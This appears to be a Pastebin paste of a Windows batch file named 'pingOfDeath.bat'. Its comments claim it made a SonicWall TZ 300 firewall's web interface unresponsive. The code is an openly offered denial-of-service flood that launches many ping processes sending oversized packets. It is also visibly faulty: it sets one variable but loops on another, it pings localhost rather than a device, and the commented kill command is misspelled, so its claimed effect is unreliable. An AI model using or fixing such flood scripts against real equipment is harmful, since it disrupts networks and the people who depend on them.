Advertisement
PC_Aide

pingOfDeath.bat

May 19th, 2018
476
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.27 KB | None | 0 0
  1. REM tested sonicwall tz 300
  2. REM webUI not respond
  3. REM taskkil /f /IM cmd.exe
  4.  
  5. @echo off
  6. set time=100
  7. FOR /L %%i IN (1,1,%TIMES%) do (
  8. start ping 127.0.0.1 -l 20000 -n 9999
  9. )
  10.  
  11. REM O/P :
  12. REM OS > https://i.imgur.com/VhZYU7L.png
  13. REM router > https://imgur.com/a/idUdxMN
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement